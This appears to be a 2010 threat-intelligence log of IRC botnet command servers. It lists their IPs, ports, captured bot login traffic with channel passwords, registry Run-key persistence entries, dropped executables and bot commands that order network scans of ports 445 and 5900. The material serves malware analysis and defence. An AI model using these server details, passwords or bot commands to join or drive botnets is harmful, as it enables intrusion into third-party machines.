Month: August 2010

62.193.249.122

Remote Host      Port Number
62.193.249.122   3305

PASS secretpass
NICK P|zmm6xnq61
USER bv41i7oge * 0 :USA|XP|932
USERHOST P|zmm6xnq61
MODE P|zmm6xnq61
JOIN #mm RSA

Other details
* The following ports were open in the system:
  Port    Protocol   Process
  69      UDP        unwise_.exe (%FontsDir%\unwise_.exe)
  1053    TCP        unwise_.exe (%FontsDir%\unwise_.exe)
  38045   TCP        unwise_.exe (%FontsDir%\unwise_.exe)

Registry Modifications
* The following Registry Keys

74.3.255.162

Remote Host    Port Number
74.3.255.162   81

NICK n[USA|XP]7375347
USER s "" "lol" :s
JOIN #newbin#
PONG 422
JOIN #USA (null)

* The following port was open in the system:
  Port   Protocol   Process
  1055   TCP        lmsn.exe (%AppData%\lmsn.exe)

Registry Modifications
* The newly created Registry Value is:
  o [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
    + Windows System Guard = "%AppData%\lmsn.exe" so that

92.243.21.78 (Virus from Saudi Arabia botnets)

Remote Host     Port Number
92.243.12.218   3211
92.243.21.78    3211
92.243.22.188   3211

NICK {NEW}[USA][XP-SP2]801696
NICK [USA][XP-SP2]784622
USER VirUs "" "lol" :4628
NICK [USA][XP-SP2]957255
USER VirUs "" "lol" :6212
USER VirUs "" "lol" :3708
NICK [USA][XP-SP2]707206
USER VirUs "" "lol" :6114
NICK [USA][XP-SP2]028704
USER VirUs "" "lol" :3165
NICK [USA][XP-SP2]934755
USER VirUs "" "lol" :7750
NICK 9552
NICK

92.243.22.188 (VirUs botnet)

Remote Host     Port Number
92.243.22.188   3211

NICK {NOVY}[USA][XP-SP2]864460
USER VirUs "" "lol" :3037
JOIN #sWo2# VrX
PRIVMSG #sWo2# :Registry/Processes cleaned.
PONG :kindly.dont.suspend

Registry Modifications
* The newly created Registry Values are:
  o [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
    + Driver Control Manager v1.0 = "%Temp%\MCDT.exe" so that MCDT.exe runs every time Windows starts
  o [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]
    + Driver Control Manager v1.0

92.241.164.101

Remote Host      Port Number
204.13.248.70    80
72.233.89.200    80
92.38.226.3      80
92.241.164.101   47221

PASS weed
PRIVMSG {iNF-00-USA-XP-CX @ :186.5kb downloaded to C:\DOCUME~1\UserName\LOCALS~1\Temp\tempfile05130.exe (93.3kbps)
QUIT Updating…
NICK {iNF-00-USA-XP-COMP-6189}
USER blaze * 0 :COMP
JOIN #crimbot
NICK {00-USA-XP-COMP-8330}

* The data identified by the following URLs was then requested from the remote web server:
  o http://checkip.dyndns.org/
  o http://www.whatismyip.com/

67.210.170.178

Remote Host      Port Number
67.210.170.178   4676

USER dpvaji dpvaji dpvaji :gcgdshoooukvmzmx
NICK d[TjTDCXB]b

Other details
* The following port was open in the system:
  Port   Protocol   Process
  1055   TCP        winamp.exe (%System%\winamp.exe)

Registry Modifications
* The newly created Registry Value is:
  o [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
    + Winamp Agent = "%System%\winamp.exe" so that winamp.exe runs every time Windows starts

tbt1.crabdance.com (Value the lamer next botnet)

tbt1.crabdance.com:9595
90.188.2.98:9595

Nick: :{00-AUS-XP-pc8-0563}
Username: TbT
Joined Channel: ##go with Password ri0t
Channel Topic for Channel ##go: "@scan svrsvc_ESP 40 8 0 -b |@scan svrsvc_FRA 40 8 0 -b"
Private Message to User {iNF-00-AUS-XP-pxd0xf8@: "^C14[^C12|^C09Scan^C12|^C14] Sequential Port Scan started on 192.168.0.0:445 with a delay of 8 seconds for 0 minutes using 40 threads."

aftermovie.ircaftermath.com (Value, Dee and a bunch of lamers botnet)

aftermovie.ircaftermath.com DNS_TYPE_A 94.23.154.167
94.23.154.167:6667

Nick: [00|USA|XP|SP3]-3720
Username: fwct
Joined Channel: ##vnc##
Channel Topic for Channel ##vnc##: ".find vnc-5900 300 5 0 82x.x.x -b"
Private Message to Channel ##vnc##: "vnc-5900 for 0 minutes 5 delay 300 threads"
Private Message to Channel ##vnc##: ".9-.1::.0[.12 ScAnAgE.0 ].1::.9-. already 301 threads. too many specified"